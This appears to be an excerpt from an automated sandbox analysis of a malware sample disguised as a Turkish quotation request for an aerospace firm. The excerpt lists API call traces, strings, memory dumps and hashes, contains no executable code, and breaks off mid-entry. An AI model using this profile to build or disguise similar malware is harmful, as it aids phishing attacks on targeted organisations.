                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001E5AA9
                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001E5AC3
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001E5ACC
                                                                                                                                    • _wcslen.LIBCMT ref: 001E5B33
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 001E5B6F
                                                                                                                                    • GetDesktopWindow.USER32 ref: 001E5B75
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 001E5B7C
                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001E5BD3
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 001E5BE0
                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 001E5C05
                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001E5C2F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 895679908-0
                                                                                                                                    • Opcode ID: 5ba2fa9d3e5965ca9a1e92144a52e44d2519dec0941cf1d1dfbcf351599de794
                                                                                                                                    • Instruction ID: caaff36315d8aec9941105080d344abbb14ec964644419c84bdd54ef9861b7ef
                                                                                                                                    • Opcode Fuzzy Hash: 5ba2fa9d3e5965ca9a1e92144a52e44d2519dec0941cf1d1dfbcf351599de794
                                                                                                                                    • Instruction Fuzzy Hash: 6D717035900B45AFDB24DFA9CE89BAEBBF6FF48708F104518E542A35A0DB75E940CB50
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[$
                                                                                                                                    • API String ID: 176396367-3695031215
                                                                                                                                    • Opcode ID: 9b7439fdbc4f21546c532f07f63971521129aad4ce0c6b152bb4808af01178e8
                                                                                                                                    • Instruction ID: feaba054faba7d498f8d542666546f7e5448c0c0859d06425ceb21881bc181a3
                                                                                                                                    • Opcode Fuzzy Hash: 9b7439fdbc4f21546c532f07f63971521129aad4ce0c6b152bb4808af01178e8
                                                                                                                                    • Instruction Fuzzy Hash: 97E10732A00956ABCB189F75C449BEEF7B0BF54710F558129E466E7280DB30AF85CB90
                                                                                                                                    APIs
                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001A00C6
                                                                                                                                      • Part of subcall function 001A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0025070C,00000FA0,4BDA72C9,?,?,?,?,001C23B3,000000FF), ref: 001A011C
                                                                                                                                      • Part of subcall function 001A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001C23B3,000000FF), ref: 001A0127
                                                                                                                                      • Part of subcall function 001A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001C23B3,000000FF), ref: 001A0138
                                                                                                                                      • Part of subcall function 001A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001A014E
                                                                                                                                      • Part of subcall function 001A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001A015C
                                                                                                                                      • Part of subcall function 001A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001A016A
                                                                                                                                      • Part of subcall function 001A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001A0195
                                                                                                                                      • Part of subcall function 001A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001A01A0
                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 001A00E7
                                                                                                                                      • Part of subcall function 001A00A3: __onexit.LIBCMT ref: 001A00A9
                                                                                                                                    Strings
                                                                                                                                    • InitializeConditionVariable, xrefs: 001A0148
                                                                                                                                    • SleepConditionVariableCS, xrefs: 001A0154
                                                                                                                                    • kernel32.dll, xrefs: 001A0133
                                                                                                                                    • WakeAllConditionVariable, xrefs: 001A0162
                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001A0122
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                    • Opcode ID: b67c00143843f2a2a73b2b4684eeeb586ee29a41872b1b140cbcf8f841ecd160
                                                                                                                                    • Instruction ID: ea8a5098cd6359e55bd307cba1ab5278e5ffb62bf60ae18ae6e4e433fd565080
                                                                                                                                    • Opcode Fuzzy Hash: b67c00143843f2a2a73b2b4684eeeb586ee29a41872b1b140cbcf8f841ecd160
                                                                                                                                    • Instruction Fuzzy Hash: 9721073AA847017BD7125B64BD4ABEA73E4EB2FB51F114129F805D2291DF70DC408A94
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,0021CC08), ref: 001F4527
                                                                                                                                    • _wcslen.LIBCMT ref: 001F453B
                                                                                                                                    • _wcslen.LIBCMT ref: 001F4599
                                                                                                                                    • _wcslen.LIBCMT ref: 001F45F4
                                                                                                                                    • _wcslen.LIBCMT ref: 001F463F
                                                                                                                                    • _wcslen.LIBCMT ref: 001F46A7
                                                                                                                                      • Part of subcall function 0019F9F2: _wcslen.LIBCMT ref: 0019F9FD
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00246BF0,00000061), ref: 001F4743
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                    • Opcode ID: f2b8e2e078945b9853fe25b41a43b6a629b3dbcc616c5c26802d0e0625808db1
                                                                                                                                    • Instruction ID: 88734fd0d3b08324325974fb0efd7578de5fcf7997eea74abe1db6559e84a143
                                                                                                                                    • Opcode Fuzzy Hash: f2b8e2e078945b9853fe25b41a43b6a629b3dbcc616c5c26802d0e0625808db1
                                                                                                                                    • Instruction Fuzzy Hash: BCB122316083069FC714EF28C890A7BB7E5BFA6724F504A1DF696C7291E730D945CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00219147
                                                                                                                                      • Part of subcall function 00217674: ClientToScreen.USER32(?,?), ref: 0021769A
                                                                                                                                      • Part of subcall function 00217674: GetWindowRect.USER32(?,?), ref: 00217710
                                                                                                                                      • Part of subcall function 00217674: PtInRect.USER32(?,?,00218B89), ref: 00217720
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002191B0
                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002191BB
                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002191DE
                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00219225
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0021923E
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00219255
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00219277
                                                                                                                                    • DragFinish.SHELL32(?), ref: 0021927E
                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00219371
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#%
                                                                                                                                    • API String ID: 221274066-994965530
                                                                                                                                    • Opcode ID: ad7a1a64adb3b9b02b1ade43f72ce423a1a0f9d5df51fe384fc59167a188c36e
                                                                                                                                    • Instruction ID: 45293c142d71dea6fccd92c0e40de30787bd2ab616538e1676374dbff927cdbe
                                                                                                                                    • Opcode Fuzzy Hash: ad7a1a64adb3b9b02b1ade43f72ce423a1a0f9d5df51fe384fc59167a188c36e
                                                                                                                                    • Instruction Fuzzy Hash: 09619E71108301AFD705EF64DC89DAFBBE8EFA9350F10092EF595931A0DB309A58CB92
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 0020B198
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0020B1B0
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0020B1D4
                                                                                                                                    • _wcslen.LIBCMT ref: 0020B200
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0020B214
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0020B236
                                                                                                                                    • _wcslen.LIBCMT ref: 0020B332
                                                                                                                                      • Part of subcall function 001F05A7: GetStdHandle.KERNEL32(000000F6), ref: 001F05C6
                                                                                                                                    • _wcslen.LIBCMT ref: 0020B34B
                                                                                                                                    • _wcslen.LIBCMT ref: 0020B366
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0020B3B6
                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0020B407
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0020B439
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020B44A
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020B45C
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0020B46E
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0020B4E3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                    • Opcode ID: 4a08fdcd75ca52f9746f9835f7836e4d95ff976cf1044a570efebf32a4b7b3a3
                                                                                                                                    • Instruction ID: a105c23cc427cdc9e9757825b6cbeb58547d973be5dc54e78fe69d48c16a0a49
                                                                                                                                    • Opcode Fuzzy Hash: 4a08fdcd75ca52f9746f9835f7836e4d95ff976cf1044a570efebf32a4b7b3a3
                                                                                                                                    • Instruction Fuzzy Hash: DFF1AC316183419FCB25EF24C891B6EBBE1AF95314F24845DF8998B2E2DB31ED50CB52
                                                                                                                                    APIs
                                                                                                                                    • GetMenuItemCount.USER32(00251990), ref: 001C2F8D
                                                                                                                                    • GetMenuItemCount.USER32(00251990), ref: 001C303D
                                                                                                                                    • GetCursorPos.USER32(?), ref: 001C3081
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001C308A
                                                                                                                                    • TrackPopupMenuEx.USER32(00251990,00000000,?,00000000,00000000,00000000), ref: 001C309D
                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001C30A9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                    • Opcode ID: c5156fada7a864875d3edb62cf9e41c15d7a98435db9df3220c5bd86c225b78b
                                                                                                                                    • Instruction ID: ba2a10c72d03c9c0859e3fe1bba9dfbe9518cd95e74c7e33aad3fb06e64fc2e2
                                                                                                                                    • Opcode Fuzzy Hash: c5156fada7a864875d3edb62cf9e41c15d7a98435db9df3220c5bd86c225b78b
                                                                                                                                    • Instruction Fuzzy Hash: 97715C71644209BFEB259F68DC49FAABF65FF21724F24421AF524661E0C7B1ED10CB90
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00216DEB
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00216E5F
                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00216E81
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00216E94
                                                                                                                                    • DestroyWindow.USER32(?), ref: 00216EB5
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00180000,00000000), ref: 00216EE4
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00216EFD
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00216F16
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00216F1D
                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00216F35
                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00216F4D
                                                                                                                                      • Part of subcall function 00199944: GetWindowLongW.USER32(?,000000EB), ref: 00199952
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                    • Opcode ID: 336d181263bf777b0b35a37016be3c012439d27c6f9075c5b07ed5c6e4956774
                                                                                                                                    • Instruction ID: c39040d99a0b494feffe4b2fa9579947b88ce4ef2baccd61ded519331f0cd259
                                                                                                                                    • Opcode Fuzzy Hash: 336d181263bf777b0b35a37016be3c012439d27c6f9075c5b07ed5c6e4956774
                                                                                                                                    • Instruction Fuzzy Hash: 19719774240341AFDB24CF18EC48FAABBE9FBA8304F14451DF99987260CB70E966CB11
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001FC4B0
                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001FC4C3
                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001FC4D7
                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001FC4F0
                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001FC533
                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001FC549
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001FC554
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001FC584
                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001FC5DC
                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001FC5F0
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001FC5FB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                    • Opcode ID: d4f9c6050cc50270ec8de1c6945ef338fe84f7b8f78a3e63492067aa829005b0
                                                                                                                                    • Instruction ID: f2ec06b17060f192951cbc5af4971b83ec88fe1ae722564a5fac36835d8cc7f9
                                                                                                                                    • Opcode Fuzzy Hash: d4f9c6050cc50270ec8de1c6945ef338fe84f7b8f78a3e63492067aa829005b0
                                                                                                                                    • Instruction Fuzzy Hash: 0E516FB464020DBFDB218F60DA48ABB7BBCFF18354F14841AFA4596250DB71E905EBA0
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00218592
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185A2
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185AD
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185BA
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002185C8
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185D7
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002185E0
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185E7
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185F8
                                                                                                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0021FC38,?), ref: 00218611
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00218621
                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00218641
                                                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00218671
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00218699
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002186AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                    • Opcode ID: b1c46a980bffd8c73c26fb4d78dc226c6fc483506f5fe9c134450d2299141fc5
                                                                                                                                    • Instruction ID: 5967bc62277b47ec1f826173aba58d5ff78994fcee9d92b6cb573fe2b628fc28
                                                                                                                                    • Opcode Fuzzy Hash: b1c46a980bffd8c73c26fb4d78dc226c6fc483506f5fe9c134450d2299141fc5
                                                                                                                                    • Instruction Fuzzy Hash: 08412975640209BFDB119FA5DC8CEEA7BBDEFA9711F208058F909E7260DB709941CB60
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 001F1502
                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001F150B
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F1517
                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001F15FB
                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 001F1657
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 001F1708
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 001F178C
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F17D8
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F17E7
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 001F1823
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
